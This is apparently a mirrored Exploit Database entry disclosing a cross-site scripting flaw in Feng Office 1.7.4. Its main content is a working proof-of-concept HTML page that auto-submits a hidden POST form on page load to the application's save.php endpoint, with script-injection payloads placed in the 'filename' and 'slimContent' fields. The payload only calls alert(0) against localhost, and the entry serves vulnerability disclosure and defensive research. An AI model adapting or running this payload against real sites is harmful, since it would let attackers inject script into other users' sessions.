Feng Office 1.7.4 – Cross-Site Scripting

• Exploit Database
• 94 阅读

• 作者： AutoSec Tools
  日期： 2014-10-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35042/

• source: https://www.securityfocus.com/bid/47049/info
  
  <html> 
  <body onload="document.forms[0].submit()"> 
  <form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php"> 
  <input type="hidden" name="filename" value=""><script>alert(0)</script>" /> 
  <input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" /> 
  </form> 
  </body> 
  </html>
  

  Python

  Copy